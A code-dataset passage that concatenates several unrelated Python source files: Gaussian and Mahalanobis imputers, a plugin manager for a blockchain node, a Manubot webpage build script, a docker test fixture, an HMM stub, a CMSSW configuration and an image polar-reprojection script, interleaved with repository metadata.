target_axis = (arr.shape[1] - np.arange(len(axis)) - 1).tolist()
if backward is True:
axis.reverse()
target_axis.reverse()
temp = arr.copy()
for tar, ax in zip(target_axis, axis):
if dim_one is True:
row_org = temp[ax].copy()
row_target = temp[tar].copy()
temp[ax], temp[tar] = row_target, row_org # swap rows
if dim_two is True:
col_org = temp[:, ax].copy()
col_target = temp[:, tar].copy()
temp[:, ax], temp[:, tar] = col_target, col_org
return temp
K = np.array([[11, 12, 13, 14], [21, 22, 23, 24], [31, 32, 33, 34], [41, 42, 43, 44]])
axis = [0, 3]
a = _swap_axis(K, axis)
b = _swap_axis(a, axis, backward=True)
assert np.alltrue(np.equal(K, b)), 'swap axis function modified'
class GaussianProcessImputer(ImputerBase):
"""
    draws imputation samples from a multivariate Gaussian: the sample mean and covariance of the
    training data define the joint distribution, which is then conditioned on the observed
    (non-imputed) features
"""
def __init__(self, df_train, **kwargs):
kwargs["standard_scale_all"]= True
super().__init__(df_train, **kwargs)
def _impute(self, df_test, impute_cols, n_imputations=100, return_reduced=True, retrain=False):
covariance_matrix = self.df_train.cov()
mean = self.df_train.mean()
# uncomment to ignore feature correlations
# covariance_matrix = pd.DataFrame(np.diag(np.diag(covariance_matrix)).reshape(covariance_matrix.shape))
res = [[] for _ in range(len(impute_cols))]
for j, ic in tqdm(list(enumerate(impute_cols))):
for i in tqdm(list(range(n_imputations)), leave=False):
n_imputed = len(ic)
# separate training and label features
index_columns = [df_test.columns.get_loc(key) for key in ic]
cov_imputed = _swap_axis(covariance_matrix.values, index_columns)
mean_imputed = _swap_axis(mean.values, index_columns)
x = _swap_axis(df_test.values, index_columns, dim=1) # sort only order of feature columns
mean_train = mean_imputed[:-n_imputed]
mean_star = mean_imputed[-n_imputed:]
x_train = x[:, :-n_imputed]
x_star = x[:, -n_imputed:]
K_tt = cov_imputed[:-n_imputed, :-n_imputed] # tt: train, train
K_st = cov_imputed[-n_imputed:, :-n_imputed] # st: star/predict, train
K_ss = cov_imputed[-n_imputed:, -n_imputed:] # ss: start/predict, star/predict
temp = scipy.linalg.solve(K_tt, (x_train - mean_train).T)
mean_conditioned = (mean_star[:, np.newaxis] + K_st @ temp).T
cov_conditioned = K_ss - K_st @ scipy.linalg.solve(K_tt, K_st.T)
mvn = scipy.stats.multivariate_normal(mean=np.zeros(n_imputed), cov=cov_conditioned)
samples = mvn.rvs(x_star.shape[0]).reshape(mean_conditioned.shape) \
+ mean_conditioned # n_samples x n_imputed
# store new samples
df_test_tmp = df_test.copy()
df_test_tmp[ic] = samples
df_test_tmp["imputation_id"] = i # add imputation id
df_test_tmp["id"] = df_test_tmp.index
if return_reduced is True:
df_test_tmp = df_test_tmp[["id", "imputation_id"] + list(ic)]
res[j].append(df_test_tmp)
return [pd.concat(r) for r in res]
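# Added clarification (not in the original module): GaussianProcessImputer._impute applies
# standard Gaussian conditioning. With the joint covariance split into K_tt (observed/observed),
# K_st (imputed/observed) and K_ss (imputed/imputed), the imputed features are drawn from
#     mean = mu_star + K_st K_tt^{-1} (x_train - mu_train)
#     cov  = K_ss  - K_st K_tt^{-1} K_st^T
# which is exactly what mean_conditioned and cov_conditioned compute via scipy.linalg.solve.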
import torch
class TrainSetMahalanobisImputer(ImputerBase):
"""
    implements the imputer from arXiv:1903.10464
    Parameters:
    sigma: appears in the denominator of the exponential; a small sigma puts most weight on the closest training observations (low bias, high variance), a large sigma does the opposite
batch_size_test: process test set in batches
"""
def __init__(self, df_train, **kwargs):
kwargs["standard_scale_all"]= True
kwargs["gpus"] = kwargs["gpus"] if "gpus" in kwargs.keys() else 0
super().__init__(df_train, **kwargs)
self.sigma = kwargs["sigma"] if "sigma" in kwargs.keys() else 0.1
self.batch_size_test = kwargs["batch_size_test"] if "batch_size_test" in kwargs.keys() else 0
def _impute(self, df_test, impute_cols, n_imputations=100, return_reduced=True, retrain=False):
non_impute_cols = [[x for x in self.df_train.columns if not(x in self.exclude_cols) and not(x in ic)] for ic in impute_cols]
train_equals_test = self.df_train.equals(df_test)
res=[]
if(self.batch_size_test>0):
batches = len(df_test)//self.batch_size_test+1 if len(df_test)%self.batch_size_test >0 else len(df_test)//self.batch_size_test
batch_id_start = [i*self.batch_size_test for i in range(batches)]
batch_id_end = [min((i+1)*self.batch_size_test,len(df_test)) for i in range(batches)]
else:
batch_id_start = [0]
batch_id_end = [len(df_test)]
for j, (ic,nic) in tqdm(list(enumerate(zip(impute_cols,non_impute_cols)))):
cov = self.df_train[nic].cov()
covinv = np.linalg.pinv(cov)#was .inv
df_imputed = []
for bis,bie in tqdm(list(zip(batch_id_start,batch_id_end)),leave=False):
xdelta = np.expand_dims(np.array(self.df_train[nic]),1)-np.expand_dims(np.array(df_test[nic].iloc[range(bis,bie)]),0) #trainid,testid,featureid
##############
if(self.kwargs["gpus"]>0):
with torch.no_grad():
xdelta_torch = torch.from_numpy(xdelta).cuda()
covinv_torch = torch.from_numpy(covinv).cuda()
distssq = torch.mean(torch.einsum('ijk,kl->ijl',xdelta_torch,covinv_torch)*xdelta_torch,dim=2).cpu().numpy()
else:
distssq = np.mean(np.einsum('ijk,kl->ijl',xdelta,covinv)*xdelta,axis=2) #trainid, testid
weights = np.exp(-0.5*distssq/self.sigma/self.sigma) #trainid, testid
#exclude the sample itself if train_equals_test
train_ids = np.argsort(weights,axis=0)[-n_imputations:,].T if not(train_equals_test) else np.argsort(weights,axis=0)[-n_imputations-1:-1,].T #testid, trainid/n_imputations
imputation_weights = np.array([weights[sid,i] for i,sid in enumerate(train_ids)]) #testid, n_imputations
assert np.all(np.sum(imputation_weights,axis=1)>1e-8),"Assert(TrainSetMahalanobisImputer): weights too small. Increase the imputer's sigma parameter."
imputation_ids = np.repeat([range(n_imputations)],bie-bis,axis=0)
test_ids = np.array([[i for _ in range(n_imputations)] for i in range(bis,bie)])
#flatten everything
train_ids = train_ids.flatten()
imputation_weights = imputation_weights.flatten()
imputation_ids = imputation_ids.flatten()
test_ids = test_ids.flatten()
if(return_reduced):
df_imputed_tmp = self.df_train[ic].iloc[train_ids].copy()
else:
df_imputed_tmp = df_test[ic].iloc[test_ids].copy()
df_imputed_tmp[ic] = self.df_train[ic].iloc[train_ids].values
df_imputed_tmp["id"]=test_ids
df_imputed_tmp["imputation_id"]=imputation_ids
df_imputed_tmp["sampling_prob"]=imputation_weights
df_imputed.append(df_imputed_tmp)
res.append(pd.concat(df_imputed))
return res
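# Added clarification (not in the original module): TrainSetMahalanobisImputer weights every
# training row by w = exp(-0.5 * d^2 / sigma^2), where d^2 is the (feature-averaged) Mahalanobis
# distance between the test row and the training row over the non-imputed columns, computed with
# the pseudo-inverse of the training covariance. The n_imputations rows with the largest weights
# are used as imputations and their weights are returned in the "sampling_prob" column; when the
# test set equals the training set, each sample is excluded from its own imputations.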
| 51.021739
| 360
| 0.623546
|
33ef2cb1b003bd4767695cd47e9d1205d09948d4
| 9,072
|
py
|
Python
|
helios/extensibility/plugin_manager.py
|
hyperevo/py-helios-node
|
ff417fe3fe90f85c9f95b3d8a5f0dd4c80532ee8
|
[
"MIT"
] | null | null | null |
helios/extensibility/plugin_manager.py
|
hyperevo/py-helios-node
|
ff417fe3fe90f85c9f95b3d8a5f0dd4c80532ee8
|
[
"MIT"
] | null | null | null |
helios/extensibility/plugin_manager.py
|
hyperevo/py-helios-node
|
ff417fe3fe90f85c9f95b3d8a5f0dd4c80532ee8
|
[
"MIT"
] | null | null | null |
from abc import (
ABC,
abstractmethod,
)
from argparse import (
ArgumentParser,
Namespace,
_SubParsersAction,
)
import asyncio
import logging
from typing import (
Any,
Awaitable,
Dict,
Iterable,
List,
Optional,
Union,
)
from lahja import (
Endpoint,
EventBus,
)
from helios.config import (
ChainConfig
)
from helios.extensibility.events import (
BaseEvent,
PluginStartedEvent,
)
from helios.extensibility.exceptions import (
UnsuitableShutdownError,
)
from helios.extensibility.plugin import (
BaseAsyncStopPlugin,
BaseIsolatedPlugin,
BaseMainProcessPlugin,
BasePlugin,
BaseSyncStopPlugin,
PluginContext,
)
class BaseManagerProcessScope(ABC):
"""
Define the operational model under which a ``PluginManager`` runs.
"""
endpoint: Endpoint
@abstractmethod
def is_responsible_for_plugin(self, plugin: BasePlugin) -> bool:
"""
Define whether a ``PluginManager`` operating under this scope is responsible
for a given plugin or not.
"""
raise NotImplementedError("Must be implemented by subclasses")
@abstractmethod
def create_plugin_context(self,
plugin: BasePlugin,
args: Namespace,
chain_config: ChainConfig,
boot_kwargs: Dict[str, Any]) -> PluginContext:
"""
Create the ``PluginContext`` for a given plugin.
"""
raise NotImplementedError("Must be implemented by subclasses")
class MainAndIsolatedProcessScope(BaseManagerProcessScope):
def __init__(self, event_bus: EventBus, main_proc_endpoint: Endpoint) -> None:
self.event_bus = event_bus
self.endpoint = main_proc_endpoint
def is_responsible_for_plugin(self, plugin: BasePlugin) -> bool:
return isinstance(plugin, BaseIsolatedPlugin) or isinstance(plugin, BaseMainProcessPlugin)
def create_plugin_context(self,
plugin: BasePlugin,
args: Namespace,
chain_config: ChainConfig,
boot_kwargs: Dict[str, Any]) -> PluginContext:
if isinstance(plugin, BaseIsolatedPlugin):
# Isolated plugins get an entirely new endpoint to be passed into that new process
context = PluginContext(
self.event_bus.create_endpoint(plugin.name)
)
context.args = args
context.chain_config = chain_config
context.boot_kwargs = boot_kwargs
return context
# A plugin that overtakes the main process never gets far enough to even get a context.
# For now it should be safe to just return `None`. Maybe reconsider in the future.
return None
class SharedProcessScope(BaseManagerProcessScope):
def __init__(self, shared_proc_endpoint: Endpoint) -> None:
self.endpoint = shared_proc_endpoint
def is_responsible_for_plugin(self, plugin: BasePlugin) -> bool:
return isinstance(plugin, BaseAsyncStopPlugin)
def create_plugin_context(self,
plugin: BasePlugin,
args: Namespace,
chain_config: ChainConfig,
boot_kwargs: Dict[str, Any]) -> PluginContext:
# Plugins that run in a shared process all share the endpoint of the plugin manager
context = PluginContext(self.endpoint)
context.args = args
context.chain_config = chain_config
context.boot_kwargs = boot_kwargs
return context
class PluginManager:
"""
    The plugin manager is responsible for registering, keeping and managing the life cycle of
    any available plugins.
.. note::
This API is very much in flux and is expected to change heavily.
"""
def __init__(self, scope: BaseManagerProcessScope) -> None:
self._scope = scope
self._plugin_store: List[BasePlugin] = []
self._started_plugins: List[BasePlugin] = []
self._logger = logging.getLogger("helios.extensibility.plugin_manager.PluginManager")
@property
def event_bus_endpoint(self) -> Endpoint:
"""
Return the ``Endpoint`` that the ``PluginManager`` uses to connect to the ``EventBus``
"""
return self._scope.endpoint
def register(self, plugins: Union[BasePlugin, Iterable[BasePlugin]]) -> None:
"""
Register one or multiple instances of :class:`~helios.extensibility.plugin.BasePlugin`
with the plugin manager.
"""
new_plugins = [plugins] if isinstance(plugins, BasePlugin) else plugins
self._plugin_store.extend(new_plugins)
def amend_argparser_config(self,
arg_parser: ArgumentParser,
subparser: _SubParsersAction) -> None:
"""
Call :meth:`~helios.extensibility.plugin.BasePlugin.configure_parser` for every registered
plugin, giving them the option to amend the global parser setup.
"""
for plugin in self._plugin_store:
plugin.configure_parser(arg_parser, subparser)
def broadcast(self, event: BaseEvent, exclude: BasePlugin = None) -> None:
"""
Notify every registered :class:`~helios.extensibility.plugin.BasePlugin` about an
event and check whether the plugin wants to start based on that event.
If a plugin gets started it will cause a
:class:`~helios.extensibility.events.PluginStartedEvent` to get
broadcasted to all other plugins, giving them the chance to start based on that.
"""
for plugin in self._plugin_store:
if plugin is exclude or not self._scope.is_responsible_for_plugin(plugin):
self._logger.debug("Skipping plugin %s (not responsible)", plugin.name)
continue
plugin.handle_event(event)
if plugin in self._started_plugins:
continue
if not plugin.should_start():
continue
plugin._start()
self._started_plugins.append(plugin)
self._logger.info("Plugin started: %s", plugin.name)
self.broadcast(PluginStartedEvent(plugin), plugin)
def prepare(self,
args: Namespace,
chain_config: ChainConfig,
boot_kwargs: Dict[str, Any] = None) -> None:
"""
Create a ``PluginContext`` for every plugin that this plugin manager instance
is responsible for.
"""
for plugin in self._plugin_store:
if not self._scope.is_responsible_for_plugin(plugin):
continue
context = self._scope.create_plugin_context(plugin, args, chain_config, boot_kwargs)
plugin.set_context(context)
def shutdown_blocking(self) -> None:
"""
Synchronously shut down all started plugins.
"""
if isinstance(self._scope, SharedProcessScope):
raise UnsuitableShutdownError("Use `shutdown` for instances of this scope")
self._logger.info("Shutting down PluginManager with scope %s", type(self._scope))
for plugin in self._started_plugins:
if not isinstance(plugin, BaseSyncStopPlugin):
continue
try:
self._logger.info("Stopping plugin: %s", plugin.name)
plugin.stop()
self._logger.info("Successfully stopped plugin: %s", plugin.name)
except Exception:
self._logger.exception("Exception thrown while stopping plugin %s", plugin.name)
async def shutdown(self) -> None:
"""
Asynchronously shut down all started plugins.
"""
if isinstance(self._scope, MainAndIsolatedProcessScope):
raise UnsuitableShutdownError("Use `shutdown_blocking` for instances of this scope")
self._logger.info("Shutting down PluginManager with scope %s", type(self._scope))
async_plugins = [
plugin for plugin in self._started_plugins
if isinstance(plugin, BaseAsyncStopPlugin)
]
stop_results = await asyncio.gather(
*self._stop_plugins(async_plugins), return_exceptions=True
)
for plugin, result in zip(async_plugins, stop_results):
if isinstance(result, Exception):
self._logger.error(
'Exception thrown while stopping plugin %s: %s', plugin.name, result
)
else:
self._logger.info("Successfully stopped plugin: %s", plugin.name)
def _stop_plugins(self,
plugins: Iterable[BaseAsyncStopPlugin]
) -> Iterable[Awaitable[Optional[Exception]]]:
for plugin in plugins:
self._logger.info("Stopping plugin: %s", plugin.name)
yield plugin.stop()
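# Illustrative sketch (added, hypothetical): the typical life cycle implied by the methods above --
# register plugins, let them amend the argument parser, prepare their contexts, broadcast events,
# and finally shut down with the call matching the manager's scope.
#
#     manager = PluginManager(SharedProcessScope(endpoint))   # endpoint: a lahja Endpoint
#     manager.register(my_plugins)
#     manager.amend_argparser_config(arg_parser, subparser)
#     manager.prepare(args, chain_config, boot_kwargs)
#     manager.broadcast(some_event)
#     ...
#     await manager.shutdown()   # or shutdown_blocking() under MainAndIsolatedProcessScope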
| 33.977528
| 98
| 0.622575
|
9f26b375d9428c4b6cc2841227ca29e34bfef14f
| 7,285
|
py
|
Python
|
build/webpage.py
|
munkm/yt-3.0-paper
|
f0fd907ae1cdec74e4b7bf880c812d9046bfcc44
|
[
"CC-BY-4.0",
"CC0-1.0"
] | 9
|
2019-05-06T10:33:03.000Z
|
2021-12-15T17:36:21.000Z
|
build/webpage.py
|
munkm/yt-3.0-paper
|
f0fd907ae1cdec74e4b7bf880c812d9046bfcc44
|
[
"CC-BY-4.0",
"CC0-1.0"
] | 38
|
2019-05-06T17:13:44.000Z
|
2019-10-22T23:27:44.000Z
|
build/webpage.py
|
munkm/yt-3.0-paper
|
f0fd907ae1cdec74e4b7bf880c812d9046bfcc44
|
[
"CC-BY-4.0",
"CC0-1.0"
] | 3
|
2019-07-25T13:15:42.000Z
|
2020-10-22T23:56:51.000Z
|
import argparse
import os
import pathlib
import shutil
import subprocess
def parse_arguments():
"""
Read and process command line arguments.
"""
parser = argparse.ArgumentParser()
parser.add_argument(
'--checkout',
nargs='?', const='gh-pages', default=None,
        help='branch to checkout /v directory contents from. For example, --checkout=upstream/gh-pages. --checkout is equivalent to --checkout=gh-pages. If --checkout is omitted, no checkout is performed.',
)
parser.add_argument(
'--version',
default=os.environ.get('TRAVIS_COMMIT', 'local'),
help="Used to create webpage/v/{version} directory. "
"Generally a commit hash, tag, or 'local'. "
"(default: '%(default)s')"
)
cache_group = parser.add_mutually_exclusive_group()
cache_group.add_argument(
'--no-ots-cache',
action='store_true',
help="disable the timestamp cache."
)
cache_group.add_argument(
'--ots-cache',
default=pathlib.Path('ci/cache/ots'),
type=pathlib.Path,
help="location for the timestamp cache (default: %(default)s)."
)
args = parser.parse_args()
return args
def configure_directories(args):
"""
    Add directories to args and create them if necessary.
Note that versions_directory is the parent of version_directory.
"""
args_dict = vars(args)
# Directory where Manubot outputs reside
args_dict['output_directory'] = pathlib.Path('output')
# Set webpage directory
args_dict['webpage_directory'] = pathlib.Path('webpage')
# Create webpage/v directory (if it doesn't already exist)
args_dict['versions_directory'] = args.webpage_directory.joinpath('v')
args.versions_directory.mkdir(exist_ok=True)
# Checkout existing version directories
checkout_existing_versions(args)
# Create empty webpage/v/version directory
version_directory = args.versions_directory.joinpath(args.version)
if version_directory.is_dir():
print(f'{version_directory} exists: replacing it with an empty directory')
shutil.rmtree(version_directory)
version_directory.mkdir()
args_dict['version_directory'] = version_directory
# Symlink webpage/v/latest to point to webpage/v/commit
latest_directory = args.versions_directory.joinpath('latest')
if latest_directory.is_symlink() or latest_directory.is_file():
latest_directory.unlink()
elif latest_directory.is_dir():
shutil.rmtree(latest_directory)
latest_directory.symlink_to(args.version, target_is_directory=True)
args_dict['latest_directory'] = latest_directory
# Create freeze directory
freeze_directory = args.versions_directory.joinpath('freeze')
freeze_directory.mkdir(exist_ok=True)
args_dict['freeze_directory'] = freeze_directory
return args
def checkout_existing_versions(args):
"""
Must populate webpage/v from the gh-pages branch to get history
References:
http://clubmate.fi/git-checkout-file-or-directories-from-another-branch/
https://stackoverflow.com/a/2668947/4651668
https://stackoverflow.com/a/16493707/4651668
Command modeled after:
git --work-tree=webpage checkout upstream/gh-pages -- v
"""
if not args.checkout:
return
command = [
'git',
f'--work-tree={args.webpage_directory}',
'checkout',
args.checkout,
'--',
'v',
]
print('Attempting checkout with the following command:', ' '.join(command), sep='\n')
process = subprocess.run(command, stderr=subprocess.PIPE)
if process.returncode == 0:
# Addresses an odd behavior where git checkout stages v/* files that don't actually exist
subprocess.run(['git', 'add', 'v'])
else:
stderr = process.stderr.decode()
print(f'Checkout returned a nonzero exit status. See stderr:\n{stderr.rstrip()}')
if 'pathspec' in stderr:
print(
'Manubot note: if there are no preexisting webpage versions (like for a newly created manuscript), '
'the pathspec error above is expected and can be safely ignored.'
) # see https://github.com/manubot/rootstock/issues/183
def create_version(args):
"""
Populate the version directory for a new version.
"""
# Copy content/images to webpage/v/commit/images
shutil.copytree(
src=pathlib.Path('content/images'),
dst=args.version_directory.joinpath('images'),
)
    # Copy output files to webpage/v/version/
renamer = {
'manuscript.html': 'index.html',
'manuscript.pdf': 'manuscript.pdf',
}
for src, dst in renamer.items():
src_path = args.output_directory.joinpath(src)
if not src_path.exists():
continue
shutil.copy2(
src=src_path,
dst=args.version_directory.joinpath(dst),
)
# Create v/freeze to redirect to v/commit
path = pathlib.Path('build/assets/redirect-template.html')
redirect_html = path.read_text()
redirect_html = redirect_html.format(url=f'../{args.version}/')
args.freeze_directory.joinpath('index.html').write_text(redirect_html)
def get_versions(args):
"""
Extract versions from the webpage/v directory, which should each contain
a manuscript.
"""
versions = {x.name for x in args.versions_directory.iterdir() if x.is_dir()}
versions -= {'freeze', 'latest'}
versions = sorted(versions)
return versions
def ots_upgrade(args):
"""
Upgrade OpenTimestamps .ots files in versioned commit directory trees.
Upgrades each .ots file with a separate ots upgrade subprocess call due to
https://github.com/opentimestamps/opentimestamps-client/issues/71
"""
ots_paths = list()
for version in get_versions(args):
ots_paths.extend(args.versions_directory.joinpath(version).glob('**/*.ots'))
ots_paths.sort()
for ots_path in ots_paths:
process_args = ['ots']
if args.no_ots_cache:
process_args.append('--no-cache')
else:
process_args.extend(['--cache', str(args.ots_cache)])
process_args.extend([
'upgrade',
str(ots_path),
])
process = subprocess.run(
process_args,
stderr=subprocess.PIPE,
universal_newlines=True,
)
if process.returncode != 0:
print(f"OpenTimestamp upgrade command returned nonzero code ({process.returncode}).")
if not process.stderr.strip() == 'Success! Timestamp complete':
print(
f">>> {' '.join(map(str, process.args))}\n"
f"{process.stderr}"
)
backup_path = ots_path.with_suffix('.ots.bak')
if backup_path.exists():
if process.returncode == 0:
backup_path.unlink()
else:
# Restore original timestamp if failure
backup_path.rename(ots_path)
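# Added note: for each versioned .ots file the loop above is roughly equivalent to running
#     ots --cache ci/cache/ots upgrade <file>.ots      (or `ots --no-cache upgrade <file>.ots`)
# one file at a time, which works around the upstream issue referenced in the docstring.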
if __name__ == '__main__':
args = parse_arguments()
configure_directories(args)
print(args)
create_version(args)
versions = get_versions(args)
print(versions)
ots_upgrade(args)
| 33.726852
| 207
| 0.650377
|
34930793f5479d421143fdadea404fa86e33751b
| 332
|
py
|
Python
|
tests/blackbox/conftest.py
|
biocatchltd/Heksher
|
b50b3659a606cb188437adb1f95747efb3ba7b59
|
[
"MIT"
] | 3
|
2021-01-21T11:41:06.000Z
|
2021-10-20T06:51:53.000Z
|
tests/blackbox/conftest.py
|
biocatchltd/Heksher
|
b50b3659a606cb188437adb1f95747efb3ba7b59
|
[
"MIT"
] | 18
|
2021-02-01T06:38:53.000Z
|
2022-02-14T13:46:33.000Z
|
tests/blackbox/conftest.py
|
biocatchltd/Heksher
|
b50b3659a606cb188437adb1f95747efb3ba7b59
|
[
"MIT"
] | null | null | null |
from docker import DockerClient
from pytest import fixture
@fixture(scope='session')
def docker_client():
# todo improve when yellowbox is upgraded
try:
ret = DockerClient.from_env()
ret.ping()
except Exception:
return DockerClient(base_url='tcp://localhost:2375')
else:
return ret
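# Illustrative note (added): pytest injects this session-scoped fixture by parameter name,
# so a blackbox test can simply declare it, e.g.
#
#     def test_docker_available(docker_client):
#         assert docker_client.ping()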
| 22.133333
| 60
| 0.671687
|
0aa3199c6901dc582ca0d843e830d822aa796709
| 993
|
py
|
Python
|
script/debug ast/ast_IfJump.py
|
virtuNat/discord.ATH
|
fb6473708cc0c1db2d5d5ba48ea53c1d6a8b0bb9
|
[
"MIT"
] | 2
|
2017-12-12T03:34:59.000Z
|
2017-12-17T22:33:37.000Z
|
script/debug ast/ast_IfJump.py
|
GiovanH/discord.-ATH
|
aa73ccd56736525a7f7018e4e11ab5b6ea706e88
|
[
"MIT"
] | null | null | null |
script/debug ast/ast_IfJump.py
|
GiovanH/discord.-ATH
|
aa73ccd56736525a7f7018e4e11ab5b6ea706e88
|
[
"MIT"
] | 2
|
2017-11-16T03:43:24.000Z
|
2017-11-30T06:07:37.000Z
|
#!/usr/bin/env python
from athstmt import *
from athinterpreter import TildeAthInterp
stmts = AthStatementList([
AthTokenStatement('PROCREATE', [IdentifierToken('TEST'), None]),
TildeAthLoop(False, AthStatementList([
CondiJump([IdentifierToken('TEST'), 3]),
AthTokenStatement('print', [LiteralToken('Test!\\n', str)]),
AthTokenStatement('REPLICATE', [IdentifierToken('TEST'), UnaryExpr(['!', IdentifierToken('TEST')])]),
CondiJump([None, 5]),
CondiJump([UnaryExpr(['!', IdentifierToken('TEST')]), 3]),
AthTokenStatement('print', [LiteralToken('Test died\\n', str)]),
AthTokenStatement('DIE', [IdentifierToken('THIS')]),
CondiJump([None, 1]),
AthTokenStatement('print', [LiteralToken('should not print\\n', str)]),
], pendant='THIS'),
AthTokenStatement('EXECUTE', [IdentifierToken('NULL')]))
], pendant='THIS')
if __name__ == '__main__':
TildeAthInterp().exec_stmts('IfJump.~ATH', stmts)
| 43.173913
| 109
| 0.645519
|
2d0c3fc6520b68a085d096b9b11063d85980024d
| 2,885
|
py
|
Python
|
pyrobolearn/models/hmm/hmm.py
|
Pandinosaurus/pyrobolearn
|
9cd7c060723fda7d2779fa255ac998c2c82b8436
|
[
"Apache-2.0"
] | 2
|
2021-01-21T21:08:30.000Z
|
2022-03-29T16:45:49.000Z
|
pyrobolearn/models/hmm/hmm.py
|
Pandinosaurus/pyrobolearn
|
9cd7c060723fda7d2779fa255ac998c2c82b8436
|
[
"Apache-2.0"
] | null | null | null |
pyrobolearn/models/hmm/hmm.py
|
Pandinosaurus/pyrobolearn
|
9cd7c060723fda7d2779fa255ac998c2c82b8436
|
[
"Apache-2.0"
] | 1
|
2020-09-29T21:25:39.000Z
|
2020-09-29T21:25:39.000Z
|
# This file describes the Hidden Markov Model
# -*- coding: utf-8 -*-
# TODO: implement this model
from gaussian import Gaussian
from model import Model
from hmmlearn.hmm import GaussianHMM
class HMM(object):
r"""Hidden Markov Models
Description: emission probabilities, transition probabilities,...
References:
[1] "Pattern Recognition and Machine Learning" (chap 13), Bishop, 2006
The code was inspired by the following codes:
* `hmmlearn`: https://github.com/hmmlearn/hmmlearn
* `ghmm`: http://ghmm.sourceforge.net/
* `pbdlib`: https://gitlab.idiap.ch/rli/pbdlib-python/tree/master/pbdlib
"""
def __init__(self, emission_prob=None):
if emission_prob is None or (isinstance(emission_prob, str) and emission_prob.lower() == 'gaussian'):
emission_prob = Gaussian()
##############
# Properties #
##############
##################
# Static Methods #
##################
@staticmethod
def copy(other):
if not isinstance(other, HMM):
raise TypeError("Trying to copy an object which is not a HMM")
@staticmethod
def isParametric():
"""The HMM is a parametric model"""
return True
@staticmethod
def isLinear():
"""The HMM is a non-linear model"""
return True
@staticmethod
def isRecurrent():
"""The HMM is recurrent; current outputs depends on previous inputs and states"""
return True
@staticmethod
def isProbabilistic():
"""The HMM a probabilistic model"""
return False
@staticmethod
def isDiscriminative():
"""The HMM is a discriminative model"""
return False
@staticmethod
def isGenerative():
"""The HMM is a generative model which models the joint distributions on states and outputs.
This means we can sample from it."""
return True
###########
# Methods #
###########
def likelihood(self):
pass
# alias
pdf = likelihood
def joint_pdf(self, X, Z):
pass
def sample(self, size=None, seed=None):
"""
Sample from the HMM.
Args:
size:
seed:
Returns:
"""
pass
def expectation_step(self):
"""
Expectation step in the expectation-maximization algorithm.
Returns:
"""
pass
def maximization_step(self):
pass
def expectation_maximization(self, X):
"""Expectation-Maximization (EM) algorithm"""
pass
def forward_backward(self):
"""Forward backward algorithm"""
pass
def sum_product(self):
"""Sum-product algorithm"""
pass
def viterbi(self):
"""Viterbi algorithm"""
pass
class HSMM(HMM):
r"""Hidden semi-Markov Models
"""
pass
| 21.691729
| 109
| 0.581282
|
effb8307d9b417e58b1bf4bbd557bd63b2e4224f
| 750
|
py
|
Python
|
HLTrigger/Configuration/python/HLT_75e33/eventsetup/hltCandidateJetProbabilityComputer_cfi.py
|
PKUfudawei/cmssw
|
8fbb5ce74398269c8a32956d7c7943766770c093
|
[
"Apache-2.0"
] | 1
|
2021-11-30T16:24:46.000Z
|
2021-11-30T16:24:46.000Z
|
HLTrigger/Configuration/python/HLT_75e33/eventsetup/hltCandidateJetProbabilityComputer_cfi.py
|
PKUfudawei/cmssw
|
8fbb5ce74398269c8a32956d7c7943766770c093
|
[
"Apache-2.0"
] | 4
|
2021-11-29T13:57:56.000Z
|
2022-03-29T06:28:36.000Z
|
HLTrigger/Configuration/python/HLT_75e33/eventsetup/hltCandidateJetProbabilityComputer_cfi.py
|
PKUfudawei/cmssw
|
8fbb5ce74398269c8a32956d7c7943766770c093
|
[
"Apache-2.0"
] | 1
|
2021-11-30T16:16:05.000Z
|
2021-11-30T16:16:05.000Z
|
import FWCore.ParameterSet.Config as cms
hltCandidateJetProbabilityComputer = cms.ESProducer("CandidateJetProbabilityESProducer",
a_dR = cms.double(-0.001053),
a_pT = cms.double(0.005263),
b_dR = cms.double(0.6263),
b_pT = cms.double(0.3684),
deltaR = cms.double(0.3),
impactParameterType = cms.int32(0),
max_pT = cms.double(500),
max_pT_dRcut = cms.double(0.1),
max_pT_trackPTcut = cms.double(3),
maximumDecayLength = cms.double(5.0),
maximumDistanceToJetAxis = cms.double(0.07),
min_pT = cms.double(120),
min_pT_dRcut = cms.double(0.5),
minimumProbability = cms.double(0.005),
trackIpSign = cms.int32(1),
trackQualityClass = cms.string('any'),
useVariableJTA = cms.bool(False)
)
| 34.090909
| 88
| 0.688
|
84fa1c3fdf7c7bd189fb84d48ab1971564996570
| 3,682
|
py
|
Python
|
scripts/environments/hexagon/convert_to_polar.py
|
bhillmann/hexalys
|
c6c102b90e2684f1c85992eaae6325b8be0c8aa6
|
[
"MIT"
] | null | null | null |
scripts/environments/hexagon/convert_to_polar.py
|
bhillmann/hexalys
|
c6c102b90e2684f1c85992eaae6325b8be0c8aa6
|
[
"MIT"
] | null | null | null |
scripts/environments/hexagon/convert_to_polar.py
|
bhillmann/hexalys
|
c6c102b90e2684f1c85992eaae6325b8be0c8aa6
|
[
"MIT"
] | null | null | null |
import matplotlib.pyplot as plt
import numpy as np
import scipy as sp
import scipy.ndimage
def main():
from environments.hexagon import open_hexagon_emulator
img = open_hexagon_emulator.captureIm()
plot_cart_image(img)
plot_polar_image(img)
def plot_polar_image(data, origin=None):
"""Plots an image reprojected into polar coordinages with the origin
at "origin" (a tuple of (x0, y0), defaults to the center of the image)"""
polar_grid, r, theta = reproject_image_into_polar(data, origin)
plt.figure()
plt.imshow(polar_grid[::-1])
plt.xlabel('Theta Coordinate (radians)')
plt.ylabel('R Coordinate (pixels)')
plt.title('Image in Polar Coordinates')
plt.savefig('polar_img.png')
def plot_cart_image(data, origin=None):
"""Plots an image reprojected into polar coordinages with the origin
at "origin" (a tuple of (x0, y0), defaults to the center of the image)"""
plt.figure()
ny, nx = data.shape[:2]
plt.imshow(data)
plt.xlabel('Width')
plt.ylabel('Height')
plt.title('Image in Cartesian Coordinates')
plt.savefig('cartesian_img.png')
def index_coords(data, origin=None):
"""Creates x & y coords for the indicies in a numpy array "data".
"origin" defaults to the center of the image. Specify origin=(0,0)
to set the origin to the lower left corner of the image."""
ny, nx = data.shape[:2]
if origin is None:
origin_x, origin_y = nx // 2, ny // 2
else:
origin_x, origin_y = origin
x, y = np.meshgrid(np.arange(nx), np.arange(ny))
x -= origin_x
y -= origin_y
return x, y
def cart2polar(x, y):
r = np.sqrt(x**2 + y**2)
theta = np.arctan2(y, x)
return r, theta
def polar2cart(r, theta):
x = r * np.cos(theta)
y = r * np.sin(theta)
return x, y
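# Added sanity-check note for the two helpers above:
#   cart2polar(0.0, 1.0)        -> (1.0, pi/2)
#   polar2cart(1.0, np.pi / 2)  -> (~0.0, 1.0)   # x is ~6e-17 due to floating point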
